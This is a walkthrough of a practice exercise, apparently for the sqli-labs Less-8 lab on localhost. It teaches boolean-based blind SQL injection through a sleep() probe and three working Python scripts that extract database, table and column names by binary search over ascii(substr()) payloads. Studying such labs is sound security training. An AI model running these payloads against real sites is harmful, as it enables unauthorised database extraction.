Probe: `?id=1' and sleep(2)-- ` (the delayed response shows that the `id` parameter is injected into a single-quoted string; the sqli-labs Less-8 target used below closes the quote that way).
The page has an injection point, so a blind-injection script is used to extract data. Note that although the probe above is time-based, the script itself does not time responses: it is boolean-based, relying on the text "You are in" appearing on the page only when the injected condition is true. Each character of the database name is found by a binary search over its ASCII value, which costs about seven requests per character.

```python
import requests


def inject_database(url):
    name = ""  # name stores the database name guessed so far
    for i in range(1, 20):  # assume the database name is shorter than 20 characters
        # low, high, middle drive a binary search over the ASCII value of the i-th character.
        # low starts below the printable range because substr() past the end of the name
        # returns '' and ascii('') is 0, so the search bottoms out at 32 once the name is complete
        low = 32
        high = 122  # 'z'
        middle = (low + high) // 2
        while low < high:
            # Payload: is the ASCII value of the i-th character greater than middle?
            payload = "1' and ascii(substr(database(),%d,1))>%d-- " % (i, middle)
            params = {"id": payload}
            r = requests.get(url, params=params)
            # The target prints "You are in" only when the injected condition holds
            if "You are in" in r.text:
                low = middle + 1
            else:
                high = middle
            middle = (low + high) // 2
        # Stop at the end of the name; this also skips spaces and non-printable characters
        if middle <= 32:
            break
        name += chr(middle)
        print(f"Current database name: {name}")
    print(f"Final database name: {name}")


if __name__ == "__main__":
    url = "http://127.0.0.1/sqlilabs7/Less-8/index.php"
    inject_database(url)
```
Using a boolean-based blind injection to extract a table name from the database:

- Loop over each character position of the table name.
- Binary search: narrow the ASCII range (the script starts at 32 rather than 48 so that the end of the name, where ascii() returns 0, is detectable) until the value of each character is determined.
- Build the SQL injection payload with substr() and ascii() to compare the table name's characters one at a time.
- Send the request and judge the outcome from the response.
- Skip spaces and non-printable characters; only valid characters are appended.
```python
import requests


def inject_table_name(url, database_name):
    table_name = ""
    for i in range(1, 20):
        low = 32    # ascii('') is 0 past the end of the name, so start below the printable range
        high = 122  # 'z'
        middle = (low + high) // 2
        while low < high:
            # limit 0,1 selects the first table; raise the offset to walk the remaining tables
            payload = (f"1' and ascii(substr((select table_name from information_schema.tables "
                       f"where table_schema='{database_name}' limit 0,1),{i},1))>{middle}-- ")
            params = {"id": payload}
            r = requests.get(url, params=params)
            if "You are in" in r.text:
                low = middle + 1
            else:
                high = middle
            middle = (low + high) // 2
        if middle <= 32:  # end of the name (or a space / non-printable character)
            break
        table_name += chr(middle)
        print(table_name)
    print(f"Final table name: {table_name}")


if __name__ == "__main__":
    url = "http://127.0.0.1/sqlilabs7/Less-8/index.php"
    database_name = "security"  # target database name
    inject_table_name(url, database_name)
```

Guessing the column names of a table with the same payload technique:
```python
import requests


def inject_column_name(url, database_name, table_name):
    column_name = ""
    for i in range(1, 20):
        low = 32    # ascii('') is 0 past the end of the name, so start below the printable range
        high = 122  # 'z'
        middle = (low + high) // 2
        while low < high:
            # limit 0,1 selects the first column; raise the offset to walk the remaining columns
            payload = (f"1' and ascii(substr((select column_name from information_schema.columns "
                       f"where table_schema='{database_name}' and table_name='{table_name}' "
                       f"limit 0,1),{i},1))>{middle}-- ")
            params = {"id": payload}
            r = requests.get(url, params=params)
            if "You are in" in r.text:
                low = middle + 1
            else:
                high = middle
            middle = (low + high) // 2
        if middle <= 32:  # end of the name (or a space / non-printable character)
            break
        column_name += chr(middle)
        print(column_name)
    print(f"Final column name: {column_name}")


if __name__ == "__main__":
    url = "http://127.0.0.1/sqlilabs7/Less-8/index.php"
    database_name = "security"
    table_name = "users"  # target table name
    inject_column_name(url, database_name, table_name)
```